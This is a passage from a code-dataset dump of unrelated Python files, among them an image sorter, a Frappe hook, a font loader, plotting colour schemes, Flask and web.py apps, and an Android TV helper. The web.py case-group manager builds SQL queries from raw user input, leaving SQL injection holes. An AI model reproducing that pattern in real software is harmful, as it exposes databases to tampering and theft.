flip_up_down(train_set)\n\taug_train_set=new_train_set.reshape(new_train_set.shape[0], int(new_train_set.shape[1]**2))\n\tprint(aug_train_set.shape)\n#\taug_train_set=random_crop(train_set, (28,28), padding=2)\n#\taug_train_set=aug_train_set.reshape(aug_train_set.shape[0], 
int(aug_train_set.shape[1]**2))\n\tnew_data_set=np.concatenate((train_set,aug_train_set),axis=0)\n\tprint(new_data_set.shape)","sub_path":"src/cifar10_linear/mnist_linear_test.py","file_name":"mnist_linear_test.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"125782164","text":"# PYTHON - LOOP LISTS:\n# Loop through a list:\n\n# 1. FOR LOOP:\nthisList = ['apple', 'banana', 'violet']\nfor x in thisList:\n print(x)\n\n# 2. WHILE LOOP:\nL1 = ['siliva', 'supra', 'lemon']\ni = 0\nwhile i < len(thisList):\n print(thisList[i])\n i = i + 1\n\n","sub_path":"listsLoops.py","file_name":"listsLoops.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"450581457","text":"#!/usr/bin/env python\n\nimport sys\nimport glob\nimport os\nimport cv2\nimport gc\nfrom os import rename, listdir\nfrom tqdm import tqdm\nfrom multiprocessing import Pool, freeze_support\n\n# Locals\nfrom color_histogram.io_util.image import loadRGB, luminance\nfrom color_histogram.core.hist_1d import Hist1D\n\n# Pictures\ndef getPictures():\n pictures = glob.glob('./*jpg')\n parent = pictures[0]\n pictures.pop(0)\n return parent, pictures\ndef renamePictures(sortedPictures):\n directory = os.getcwd()\n for i, picture in enumerate(sortedPictures):\n current = directory+'/'+picture[2:len(picture)]\n new = directory+'/'+str(i)+'_'+picture[2:len(picture)]\n os.rename(current, new)\n\n# Luminance\ndef getLum(pic):\n img = loadRGB(pic)\n lum = luminance(img)\n del img\n gc.collect()\n return ((lum_average(lum), pic))\ndef lum_average(array):\n result = 0\n length = 0\n for row in array:\n for element in row:\n result += element\n length += 1\n return result / length\ndef sortLum(parent, this_pictures):\n pictures = this_pictures[:]\n pictures.insert(0, parent)\n\n pool = Pool(4)\n lums = pool.map(getLum, pictures)\n 
pool.close()\n pool.join()\n\n lums.sort(key=lambda x: x[0])\n\n pictureNames = []\n for pic in lums:\n pictureNames.append(pic[1])\n renamePictures(pictureNames)\n\n# Color\ndef compare(image_file1, image_file2):\n def histogram(image_file):\n image = loadRGB(image_file)\n hist1D = Hist1D(image, num_bins=12)\n densities = hist1D.colorDensities()\n rgbColors = hist1D.rgbColors()\n colors = map(lambda x: x*255, rgbColors)\n return list(zip(densities, colors))\n\n def difference(a,b):\n length = min(len(a), len(b))\n c = []\n for i in range(length):\n vec = []\n for j in range(len(a[i])):\n vec.append(abs(a[i][j] - b[i][j]))\n c.append(vec)\n return c\n\n def average(diff):\n avg_den = 0\n avg_rgb = 0\n for el in diff:\n avg_den += el[0]\n avg_rgb += ( sum(el[1]) / len(el[1]) )\n avg_den /= len(diff)\n avg_rgb /= len(diff)\n return avg_den, avg_rgb\n\n im1 = histogram(image_file1)\n im2 = histogram(image_file2)\n\n diff = difference(im1, im2)\n avg_den, avg_rgb = average(diff)\n\n del im1\n del im2\n gc.collect()\n\n return avg_den, avg_rgb, image_file2\ndef clusterPictures(parent, pictures):\n clusters = []\n for pic in tqdm(pictures, desc='Color'):\n clusters.append(compare(parent, pic))\n clusters.sort(key=lambda x: x[1])\n clusters.insert(0, [0,0,parent])\n return clusters\ndef sortColor(parent, pictures):\n def getNames(clusters):\n result = []\n for cluster in clusters:\n try:\n result.append(cluster[2])\n except:\n pass\n return result\n\n clusters = clusterPictures(parent, pictures)\n names = getNames(clusters)\n renamePictures(names)\n\n# Entry\ndef main():\n def print_help():\n print('-d\\t--debug: Enables debug for when this thing does a thing that gives you a spook.')\n print('-h\\t--help: The thing you just done diddly did.')\n print('-l\\t--luminance: Enables sorting by luminance.')\n print('-c\\t--color: Enables sorting by color.')\n print('\\nNotes:')\n print('If luminance and color are both set, luminance will occur before color.')\n print('Doing so 
tends to produce better results.')\n\n # Sys Args\n sort_lum = False\n sort_col = False\n\n for i in range(len(sys.argv)):\n if sys.argv[i] == '-d' or sys.argv[i] == '--debug':\n print('Debug Mode')\n import better_exceptions\n\n if sys.argv[i] == '-h' or sys.argv[i] == '--help':\n print_help()\n\n if sys.argv[i] == '-l' or sys.argv[i] == '--luminance':\n print('Luminance: Enabled')\n sort_lum = True\n\n if sys.argv[i] == '-c' or sys.argv[i] == '--color':\n print('Color: Enabled')\n sort_col = True\n\n if sort_lum:\n sortLum(*getPictures())\n if sort_col:\n sortColor(*getPictures())\n\nif __name__ == '__main__':\n freeze_support()\n main()\n","sub_path":"sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"385882395","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2020, seabridge_app and contributors\n# For license information, please see license.txt\n\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe.frappeclient import FrappeOAuth2Client,OAuth2Session\nfrom frappe.model.document import Document\nimport json\nimport requests\nfrom datetime import datetime\n\nclass PurchaseInvoice(Document):\n\tpass\n\n@frappe.whitelist()\ndef update_status(doc,method):\n if doc.payment_type==\"Pay\":\n for val in doc.references:\n if val.reference_doctype==\"Purchase Invoice\":\n if val.outstanding_amount==0: \n pi_doc=frappe.get_doc(\"Purchase Invoice\",val.reference_name) \n pi_doc.db_set('workflow_state','Paid')\n pi_doc.db_set('status','Paid')\n pi_doc.db_set('paid_date',datetime.date(datetime.now()))\n\n\ndef update_status_on_cancel(doc,method):\n if doc.payment_type==\"Pay\":\n for val in doc.references:\n if val.reference_doctype==\"Purchase Invoice\":\n if val.outstanding_amount>0:\n pi_doc=frappe.get_doc(\"Purchase Invoice\",val.reference_name) \n pi_doc.db_set('workflow_state','To Pay')\n 
\n\n","sub_path":"seabridge_app/seabridge_app/doctype/payment_entry/payment_entry.py","file_name":"payment_entry.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"508341978","text":"import os\nimport mmap\nimport struct\nimport array\n\nimport BSAFontElement\n\nclass BSAFont:\n '''Fonts are stored with 95 symbols, representing ASCII 33-127. The first\n 95 bytes are a count of lines used for each symbol, followed by a bunch\n of 16-bit values. Each 16-bit word is a line of one symbol, in the form\n of a bitmask indicating which pixels on that line should be colored.\n \n There is no width value encoded in the font data. This must be determined\n by scanning each line of a particular symbol, locating the last (lowest)\n bit on the line.\n \n The symbol data is loaded into the given array as 96 symbols (adding one\n for the space, so no special case is requiring to insert spaces into\n text). The lines are also stored as 16-bit values, leaving it to the\n rendering code to scan the bits and determine which ones need to be set. 
\n \n These are the font files found in the Arena directory:\n ARENAFNT.DAT, height = 9\n CHARFNT.DAT, height = 8\n FONT_A.DAT, height = 11\n FONT_B.DAT, height = 6\n FONT_C.DAT, height = 14\n FONT_D.DAT, height = 7\n FONT_S.DAT, height = 5\n FONT4.DAT, height = 7\n TEENYFNT.DAT, height = 8'''\n SYMBOL_NUMBER = 96\n \n def __init__(self, filename = '', font_height = 0):\n self._filename = filename\n self._font_height = font_height\n self._symbols = [BSAFontElement.BSAFontElement() \\\n for i in xrange(self.SYMBOL_NUMBER)]\n\n def __repr__(self):\n return 'BSAFont:filename=[' + self._filename + '],symbols=[' + \\\n self._symbols.__repr__() + '],font_height=[' + \\\n self._font_height.__repr__() + ']'\n \n # setters\n def set_filename(self, filename):\n self._filename = filename\n \n def set_symbols(self, symbols):\n self._symbols = symbols\n \n def set_font_height(self, font_height):\n self._font_height = font_height\n \n # getters\n def get_filename(self):\n return self._filename\n \n def get_symbols(self):\n return self._symbols\n\n def get_font_height(self):\n return self._font_height\n\n def _open(self):\n self._file = open(self._filename, 'rb')\n size = os.path.getsize(self._filename)\n #self._mmaped_file = mmap.mmap(file.fileno(), size, mmap.MAP_PRIVATE,\\\n # mmap.PROT_READ)\n\n def _close(self):\n #self._mmaped_file.close()\n self._file.close()\n \n def load(self):\n self._open()\n \n #self._mmaped_file.seek(95)\n self._file.seek(95)\n \n#===============================================================================\n# Special case for the space. 
There is no font symbol for it,\n# pad out a symbol for it based upon the font size.\n#===============================================================================\n \n self._symbols[0].set_width(4)\n self._symbols[0].set_height(self._font_height)\n \n for i in xrange(1, self.SYMBOL_NUMBER):\n self._symbols[i].set_height(self._font_height)\n \n width = 0\n \n line_num = 0\n while line_num < self._symbols[i].get_height():\n line = self._file.read(2)\n \n self._symbols[i].add_line(line)\n \n#===============================================================================\n# Scan through this line of data to determine how many pixels\n# are required to draw it. If this line is longer than any\n# others, update the width of the symbol. Once done, we know\n# exactly how many pixels to render for this symbol, which\n# also is useful when computing the length of a full line of\n# text.\n#===============================================================================\n mask = 0x8000\n \n for k in xrange(16):\n tmp_lines = self._symbols[i].get_lines()\n \n #tmp = array.array('h', tmp_lines[line_num])\n line = struct.unpack('H', tmp_lines[line_num])[0]\n if (line & mask) != 0:\n if width < (k + 1):\n width = k + 1\n \n mask = mask >> 1\n #- Pad out the width an extra pixel for inter-character spacing.\n width += 1\n \n self._symbols[i].set_width(width)\n line_num += 1\n \n self._close()\n ","sub_path":"DataExtraction/BSAFont.py","file_name":"BSAFont.py","file_ext":"py","file_size_in_byte":4770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"527027045","text":"from flask import Flask, render_template, request\nimport hackbright_app\n\napp = Flask(__name__)\n\n# @app.route(\"/\")\n# def get_github():\n# return render_template(\"get_github.html\")\n\n@app.route(\"/student\")\ndef get_student():\n hackbright_app.connect_to_db()\n student_github = request.args.get(\"github\")\n row = 
hackbright_app.get_student_by_github(student_github)\n grades_str = hackbright_app.get_all_grades(row[2])\n\n\n html = render_template(\"student_info.html\", first_name=row[0],\n last_name=row[1],\n github=row[2], \n grades = grades_str)\n return html\n\n@app.route(\"/newstudent\")\ndef make_student():\n hackbright_app.connect_to_db()\n student_first_name = request.args.get(\"first_name\")\n student_last_name = request.args.get(\"last_name\")\n student_github = request.args.get(\"github\")\n \n hackbright_app.make_new_student(student_first_name, student_last_name, student_github)\n row = hackbright_app.get_student_by_github(student_github)\n\n html = render_template(\"student_info.html\", first_name=row[0],\n last_name=row[1],\n github=row[2])\n return html\n\n@app.route(\"/project\")\ndef get_project(): \n hackbright_app.connect_to_db()\n project_title = request.args.get(\"project_title\")\n row = hackbright_app.get_project_title(project_title)\n\n html = render_template(\"project_info.html\", project=row)\n\n return html\n\n@app.route(\"/newproject\")\ndef make_project():\n hackbright_app.connect_to_db()\n title = request.args.get(\"title\")\n description = request.args.get(\"description\")\n max_grade = request.args.get(\"max_grade\")\n hackbright_app.make_new_project(title, max_grade, description)\n\n row = hackbright_app.get_project_info(title)\n html = render_template(\"project_info.html\", project=row)\n\n return html\n\n\n\n@app.route(\"/\")\ndef new_project():\n return render_template(\"new_project.html\")\n\n# @app.route(\"/\")\n# def new_student():\n# return render_template(\"new_student.html\")\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"webapp.py","file_name":"webapp.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"140910178","text":"\n#############################################################\n# pippi: parse it, plot it\n# 
------------------------\n# Colour scheme module for pippi. Add your own at the end of\n# this file.\n#\n# Author: Pat Scott (patscott@physics.mcgill.ca)\n# Originally developed: March 2012\n#############################################################\n\nimport re\nimport copy\n\npermittedSchemes = {}\n\ndef Blockshading(colour,line_code, fill_code):\n scheme = colourScheme('Blockshading_'+colour)\n scheme.baseProfColourMap = '#fff--#fff(contour1)--#'+fill_code+'(contour1)--#'+fill_code\n scheme.basePostColourMap = '#fff--#fff(contour1)--#'+fill_code+'(contour1)--#'+fill_code\n scheme.mainPostContourColour2D = '\\'#'+line_code+'\\''\n scheme.mainProfContourColour2D = '\\'#'+line_code+'\\''\n scheme.mainBestFitColour1D = '#'+line_code\n scheme.mainPostMeanColour1D = '#'+line_code\n scheme.mainBestFitColour2D = '#'+line_code\n scheme.mainPostMeanColour2D = '#'+line_code\n scheme.fillTransparency2D = '0.85' #so far this is not actually functional in ctioga2; presumably it will work in later versions.\n return scheme\n\n\nclass colourScheme:\n # Class for pippi plotting colour schemes\n\n # Name of colour scheme\n name = ''\n\n # Default values for colours\n mainPostColour1D = 'Blue'\n mainProfColour1D = 'Red'\n mainPostContourColour2D = 'Black'\n mainProfContourColour2D = 'Black'\n comparisonPostColour1D = 'Grey'\n comparisonProfColour1D = 'Grey'\n comparisonPostContourColour2D = 'Grey'\n comparisonProfContourColour2D = 'Grey'\n baseProfColourMap = '#fff--#fff(contour2)--#f45(contour1)--#612'\n basePostColourMap = '#fff--#fff(contour2)--#88f(contour1)--#229'\n\n # Default values for 1D plotting styles\n fillTransparency1D = '0.85'\n main1DLineStyle = 'Solid'\n comparison1DLineStyle = 'Solid' #alt: 'Dots', 'Dashes'\n lineWidth1D = '0.9'\n\n # Default values for 2D contour plotting styles\n fillTransparency2D = '1.0'\n mainContourStyle = 'Solid'\n comparisonContourStyle = 'Solid'\n lineWidth2D = '0.9'\n\n # Default text and axis colours\n legendTextColour1D = 'Black'\n 
keyTextColour1D = 'Black'\n axisColour1D = 'Black'\n legendTextColour2D = 'Black'\n keyTextColour2D = 'Black'\n axisColour2D = 'Black'\n\n # Default markers and their colours\n referenceMarkerInner = 'Cross'\n referenceMarkerInnerScale = 0.7\n referenceMarkerInnerColour = 'Black'\n referenceMarkerOuter = 'Times'\n referenceMarkerOuterScale = 0.7\n referenceMarkerOuterColour = 'Yellow'\n\n mainBestFitMarker = 'Star'\n mainBestFitMarkerScale = 0.8\n mainBestFitColour1D = '#300'\n mainBestFitColour2D = '#300'\n mainBestFitColourOutline2D = 'Black'\n\n mainPostMeanMarker = 'Bullet'\n mainPostMeanMarkerScale = 0.6\n mainPostMeanColour1D = '#004'\n mainPostMeanColour2D = '#004'\n mainPostMeanColourOutline2D = 'Black'\n\n comparisonBestFitMarker = 'Star'\n comparisonBestFitMarkerScale = 0.8\n comparisonBestFitColour = 'Grey'\n\n comparisonPostMeanMarker = 'Bullet'\n comparisonPostMeanMarkerScale = 0.6\n comparisonPostMeanColour = 'Grey'\n\n def __init__(self,name):\n global permittedSchemes\n name = name.lower()\n self.name = name\n if permittedSchemes is None:\n permittedSchemes = {name:self}\n else:\n permittedSchemes[name] = self\n\n def colourMap(self,contours,kind):\n #Construct colourmap from base colour map and contour levels\n if kind == 'post':\n localColourMap = self.basePostColourMap\n elif kind == 'like':\n localColourMap = self.baseProfColourMap\n elif kind == 'obs':\n localColourMap = self.baseObsColourMap\n else:\n sys.exit(' Error: unrecognised type of colourmap requested.\\n Quitting...\\n')\n for i, contour in enumerate(contours):\n localColourMap = re.sub(r'contour'+str(i+1), contour, localColourMap)\n return localColourMap\n\n# basic colour scheme\nbasic = colourScheme('basic')\n\n# iceCube colour scheme\niceCube = colourScheme('iceCube')\niceCube.baseProfColourMap = '#fff--#fff(contour2)--#292(contour1)--#f55(contour1)--#000'\niceCube.basePostColourMap = '#fff--#fff(contour2)--#29d(contour1)--#f55(contour1)--#000'\niceCube.baseObsColourMap = 
'hls:White(contour1)--Red(contour2)--Green(contour3)'\niceCube.mainBestFitColour1D = 'Black'\niceCube.mainPostMeanColour1D = 'Black'\niceCube.mainBestFitColour2D = 'Black'\niceCube.mainPostMeanColour2D = 'Black'\n\n# iceCube79 colour scheme\niceCube79 = colourScheme('iceCube79')\niceCube79.baseProfColourMap = '#fff--#fff(contour2)--#fab(contour1)--#f45'\niceCube79.basePostColourMap = '#fff--#fff(contour2)--#ddf(contour1)--#88f'\niceCube79.baseObsColourMap = 'hls:White(contour1)--Red(contour2)--Green(contour3)'\niceCube79.mainBestFitColour1D = 'Black'\niceCube79.mainPostMeanColour1D = 'Black'\niceCube79.mainBestFitColour2D = 'Black'\niceCube79.mainPostMeanColour2D = 'Black'\niceCube79.mainPostContourColour2D = 'Grey'\niceCube79.mainProfContourColour2D = 'Grey'\niceCube79.lineWidth2D = '1.5'\n\n# iceCube3sig colour scheme\niceCube3sig = colourScheme('iceCube3sig')\niceCube3sig.baseProfColourMap = '#fff--#fff(contour3)--#292(contour2)--#fff(contour2)--#929(contour1)--#f55(contour1)--#000'\niceCube3sig.basePostColourMap = '#fff--#fff(contour3)--#29d(contour2)--#fff(contour2)--#929(contour1)--#f55(contour1)--#000'\niceCube3sig.baseObsColourMap = 'hls:White(contour1)--Red(contour2)--Green(contour3)'\niceCube3sig.mainBestFitColour1D = 'Black'\niceCube3sig.mainPostMeanColour1D = 'Black'\niceCube3sig.mainBestFitColour2D = 'Black'\niceCube3sig.mainPostMeanColour2D = 'Black'\n\n# SBClassic colour scheme\nSBClassic = colourScheme('SBClassic')\nSBClassic.baseProfColourMap = '#fff--#fff(contour2)--#2f2(contour1)--#f33(0.5)--#000'\nSBClassic.basePostColourMap = '#fff--#fff(contour2)--#95d(contour1)--#f33(0.5)--#000'\nSBClassic.baseObsColourMap = 'hls:White(contour1)--Red(contour2)--Green(contour3)'\nSBClassic.mainBestFitColour1D = 'Black'\nSBClassic.mainPostMeanColour1D = 'Black'\nSBClassic.mainBestFitColour2D = 'Black'\nSBClassic.mainPostMeanColour2D = 'Black'\n\n# BlueGold colour scheme\nBlueGold = colourScheme('BlueGold')\nBlueGold.baseProfColourMap = 
'#fff--#fff(contour2)--#f44(contour2)--#f44(contour1)--#ece(contour1)--#ece'\nBlueGold.basePostColourMap = '#fff--#fff(contour2)--#44f(contour2)--#44f(contour1)--#fc0(contour1)--#fc0'\nBlueGold.baseObsColourMap = 'hls:White(contour1)--Red(contour2)--Green(contour3)'\nBlueGold.mainPostContourColour2D = 'DarkBlue'\nBlueGold.mainProfContourColour2D = 'Maroon'\nBlueGold.mainBestFitColour = 'Black'\nBlueGold.mainBestFitColour1D = 'Black'\nBlueGold.mainPostMeanColour1D = 'Black'\nBlueGold.mainBestFitColour2D = 'Black'\nBlueGold.mainPostMeanColour2D = 'Black'\n\n# nightOfTheAllanachs colour scheme\nnightOfTheAllanachs = colourScheme('nightOfTheAllanachs')\nnightOfTheAllanachs.basePostColourMap = '#000--#000(contour2)--#808(contour1)--#f33(0.5)--#ff0'\nnightOfTheAllanachs.baseProfColourMap = '#000--#000(contour2)--#33f(contour1)--#0ff(0.5)--#ff0'\nnightOfTheAllanachs.baseObsColourMap = 'Black(contour1)--Red(contour2)--Green(contour3)'\nnightOfTheAllanachs.mainPostContourColour2D = 'White'\nnightOfTheAllanachs.mainProfContourColour2D = 'White'\nnightOfTheAllanachs.axisColour2D = 'White'\nnightOfTheAllanachs.mainBestFitColour1D = 'Black'\nnightOfTheAllanachs.mainPostMeanColour1D = 'Black'\nnightOfTheAllanachs.mainBestFitColour2D = 'White'\nnightOfTheAllanachs.mainPostMeanColour2D = 'White'\nnightOfTheAllanachs.legendTextColour2D = 'White'\nnightOfTheAllanachs.keyTextColour2D = 'White'\nnightOfTheAllanachs.comparisonContourStyle = 'Dashes'\nnightOfTheAllanachs.comparison1DLineStyle = 'Dashes'\n\n# nightOfTheAllanachs2 colour scheme\nnightOfTheAllanachs2 = colourScheme('nightOfTheAllanachs2')\nnightOfTheAllanachs2.basePostColourMap = '#000--#000(contour2)--#808(contour1)--#f33(0.5)--#ff0'\nnightOfTheAllanachs2.baseProfColourMap = '#000--#000(contour2)--#33f(contour1)--#0ff(0.5)--#ff0'\nnightOfTheAllanachs2.baseObsColourMap = 'Black(contour1)--Red(contour2)--#00FFFF(contour3)'\nnightOfTheAllanachs2.mainPostContourColour2D = 'White'\nnightOfTheAllanachs2.mainProfContourColour2D 
= 'White'\nnightOfTheAllanachs2.axisColour2D = 'White'\nnightOfTheAllanachs2.mainBestFitColour1D = 'Red'\nnightOfTheAllanachs2.mainPostMeanColour1D = 'Blue'\nnightOfTheAllanachs2.mainBestFitColour2D = 'White'\nnightOfTheAllanachs2.mainBestFitColourOutline2D = 'Black'\nnightOfTheAllanachs2.mainPostMeanColour2D = 'White'\nnightOfTheAllanachs2.mainPostMeanColourOutline2D = 'Black'\nnightOfTheAllanachs2.legendTextColour2D = 'White'\nnightOfTheAllanachs2.keyTextColour2D = 'White'\nnightOfTheAllanachs2.comparisonContourStyle = 'Dashes'\nnightOfTheAllanachs2.comparison1DLineStyle = 'Dashes'\n\n# nightOfTheAllanachs3 colour scheme\nnightOfTheAllanachs3 = colourScheme('nightOfTheAllanachs3')\nnightOfTheAllanachs3.basePostColourMap = '#000--#000(contour2)--#808(contour1)--#f33(0.5)--#ff0'\nnightOfTheAllanachs3.baseProfColourMap = '#000--#000(contour2)--#33f(contour1)--#0ff(0.5)--#ff0'\nnightOfTheAllanachs3.baseObsColourMap = 'Black(contour1)--Blue(contour2)--Orange(contour3)'\nnightOfTheAllanachs3.mainPostContourColour2D = 'White'\nnightOfTheAllanachs3.mainProfContourColour2D = 'White'\nnightOfTheAllanachs3.axisColour2D = 'White'\nnightOfTheAllanachs3.mainBestFitColour1D = 'Red'\nnightOfTheAllanachs3.mainPostMeanColour1D = 'Blue'\nnightOfTheAllanachs3.mainBestFitColour2D = 'White'\nnightOfTheAllanachs3.mainBestFitColourOutline2D = 'Black'\nnightOfTheAllanachs3.mainPostMeanColour2D = 'White'\nnightOfTheAllanachs3.mainPostMeanColourOutline2D = 'Black'\nnightOfTheAllanachs3.legendTextColour2D = 'White'\nnightOfTheAllanachs3.keyTextColour2D = 'White'\nnightOfTheAllanachs3.comparisonContourStyle = 'Dashes'\nnightOfTheAllanachs3.comparison1DLineStyle = 'Dashes'\n\n# Blockshading colour schemes\nBlockshading_red = Blockshading(\"red\", \"800\", \"e00\")\nBlockshading_green = Blockshading(\"green\", \"080\", \"0e0\")\nBlockshading_blue = Blockshading(\"blue\", \"005\", \"44f\")\nBlockshading_pink = Blockshading(\"pink\", \"808\", \"e0e\")\nBlockshading_purple = 
Blockshading(\"purple\", \"303\", \"80e\")\nBlockshading_orange = Blockshading(\"orange\", \"840\", \"f90\")\nBlockshading_yellow = Blockshading(\"yellow\", \"870\", \"fe0\")\nBlockshading_cyan = Blockshading(\"cyan\", \"088\", \"3ee\")\n","sub_path":"pippi_colours.py","file_name":"pippi_colours.py","file_ext":"py","file_size_in_byte":10123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"473985097","text":"import web\nfrom web import form\nfrom config import *\nfrom myutils import *\n\nrender = web.template.render('./templates/', base='layout', cache=False)\n\nurls = (\n '/new', 'add_new_case_group',\n '/edit/(.*)', 'edit_case_group',\n '/assign/(.*)', 'assign_case_group',\n '(.*)', 'view_all_case_group',\n)\n\nv_name = form.regexp(r\".{1,50}$\", 'must fill in this field')\n\ndef get_form(cn='', s=True):\n add_case_group_form = form.Form(\n form.Textbox(\"name\", v_name, description=\"Test case group name: \", size=\"50\", value=cn),\n form.Checkbox(\"status\", description=\"Active? 
\", size=\"50\", value='ACTIVE', checked=s)\n )\n return add_case_group_form\n\nclass add_new_case_group:\n def GET(self):\n f = get_form()\n return render.case_group_add(f, 'Add')\n\n def POST(self):\n f = get_form()\n if not f.validates():\n return render.case_add(f, 'Add')\n else:\n f_status = web.input().has_key('status') and web.input().status or 'IN_ACTIVE'\n sql_stmt = '''INSERT INTO test_case_group(name, status)\n VALUES\n (\"%s\", \"%s\" );''' % (web.input().name, f_status)\n try:\n DB.query(sql_stmt)\n except:\n return render.error_add_case_group(web.input())\n return render.add_case_group_success(web.input(), 'added')\n \nclass view_all_case_group:\n def GET(self, name):\n sql_stmt = BASE_GET_TEST_CASE_GROUP_STMT + ' HAVING tcg.id > 0'\n result = myutils.map_query(sql_stmt)\n return render.case_group_all(result)\n\nclass edit_case_group:\n def GET(self, name):\n sql_stmt = BASE_GET_TEST_CASE_GROUP_STMT + ' HAVING tcg.id = %s' % name\n result = myutils.map_query(sql_stmt)[0]\n f_status = result.status == 'ACTIVE' and True or False\n f = get_form(result.name, f_status)\n return render.case_group_add(f, 'edit')\n\n def POST(self, name):\n update_status = web.input().has_key('status') and web.input().status or 'IN_ACTIVE'\n sql_stmt = 'UPDATE test_case_group SET name = \"%s\", status= \"%s\" WHERE id = %s;' % (web.input().name, update_status, name)\n try:\n DB.query(sql_stmt)\n except:\n return render.error_add_case_group(web.input())\n return render.add_case_group_success(web.input(), 'edited')\n\nclass assign_case_group:\n def GET(self, id):\n page_num = int(web.input().has_key('page') and web.input().page or '1')\n page_size = PAGE_SIZE\n sql_statement = BASE_GET_CASE_INFO_STMT\n sql_condition = []\n para_dict = {}\n para = ''\n if web.input().has_key('kw') and len(str(web.input()['kw'])) > 0:\n sql_condition.append(\" tc.name LIKE '%\" + str(web.input().kw) + \"%' \")\n para_dict['kw'] = str(web.input().kw)\n if web.input().has_key('desc') and 
len(str(web.input()['desc'])) > 0:\n sql_condition.append(\" tc.description LIKE '%\" + str(web.input().desc) + \"%' \")\n para_dict['desc'] = str(web.input().desc)\n\n sql_condition_stmt = ''\n for i in range(len(sql_condition)):\n if i > 0 and i < len(sql_condition):\n sql_condition_stmt += ' OR ' + sql_condition[i]\n else:\n sql_condition_stmt += sql_condition[i]\n if len(sql_condition_stmt) > 0:\n sql_condition_stmt = ' WHERE ' + sql_condition_stmt\n\n sql_statement += sql_condition_stmt\n for k,v in para_dict.iteritems():\n para += '&%s=%s' % (k, v)\n \n count_stmt = sql_statement \n sql_statement += ' LIMIT %s, %s' % ((int(page_num) - 1)*page_size, page_size)\n result = myutils.map_query(sql_statement)\n # filter duplicate rows, concat test case group\n d_result = myutils.de_duplicate_result(result)\n total_page = len(DB.query(count_stmt))/page_size + 1\n case_group_name = DB.query('''SELECT name FROM test_case_group WHERE id = %s''' % id)[0]['name'];\n return render.case_group_assign(d_result, total_page, page_num, page_size, 5, case_group_name, id, para)\n\ncase_group_manager_web = web.application(urls, locals())\n\n","sub_path":"case_group_manager.py","file_name":"case_group_manager.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"414042573","text":"\"\"\"Connect to a device and determine whether it's an Android TV or an Amazon Fire TV.\n\nADB Debugging must be enabled.\n\"\"\"\n\nfrom .androidtv import AndroidTV\nfrom .basetv import BaseTV\nfrom .firetv import FireTV\n\n\ndef setup(host, adbkey='', adb_server_ip='', adb_server_port=5037, device_class='auto'):\n \"\"\"Connect to a device and determine whether it's an Android TV or an Amazon Fire TV.\n\n Parameters\n ----------\n host : str\n The address of the device in the format ``:``\n adbkey : str\n The path to the ``adbkey`` file for ADB authentication; the file ``adbkey.pub`` must be in the same 
directory\n adb_server_ip : str\n The IP address of the ADB server\n adb_server_port : int\n The port for the ADB server\n device_class : str\n The type of device: ``'auto'`` (detect whether it is an Android TV or Fire TV device), ``'androidtv'``, or ``'firetv'```\n\n Returns\n -------\n aftv : AndroidTV, FireTV\n The representation of the device\n\n \"\"\"\n if device_class == 'androidtv':\n return AndroidTV(host, adbkey, adb_server_ip, adb_server_port)\n\n if device_class == 'firetv':\n return FireTV(host, adbkey, adb_server_ip, adb_server_port)\n\n if device_class != 'auto':\n raise ValueError(\"`device_class` must be 'androidtv', 'firetv', or 'auto'.\")\n\n aftv = BaseTV(host, adbkey, adb_server_ip, adb_server_port)\n\n # Fire TV\n if aftv.device_properties.get('manufacturer') == 'Amazon':\n aftv.__class__ = FireTV\n\n # Android TV\n else:\n aftv.__class__ = AndroidTV\n\n return aftv\n","sub_path":"androidtv/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"170895435","text":"depósito_inicial = float(input(\"Qual é seu depósito inicial? Déposito Inicial: \"))\ndeposito_mensal = float(input(\"Qual vai ser seu déposito mensal? Déposito Mensal: \"))\ntaxa_de_juros = float(input(\"Qual é a taxa de juros? 
Taxa de Juros Mensal: \"))\n\nmês = depósito_inicial * (1 + taxa_de_juros)\n\nnumero_do_mês = 1\n\nwhile numero_do_mês <= 24:\n mês = (depósito_inicial + deposito_mensal*numero_do_mês) * (1 + taxa_de_juros) ** (numero_do_mês + 1)\n print(\"{0:.2f}\".format(mês))\n numero_do_mês = numero_do_mês + 1\n\nprint(\"{0:.2f}\".format(mês - depósito_inicial - 24*deposito_mensal))","sub_path":"backup/user_154/ch35_2019_04_12_17_19_09_212637.py","file_name":"ch35_2019_04_12_17_19_09_212637.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"336824720","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Peter Burton R00038147\n\"\"\"\n\nimport time\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport pandas as pd\nimport numpy as np\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import cross_validation\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn import metrics\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.grid_search import RandomizedSearchCV\nfrom sklearn import model_selection\nfrom 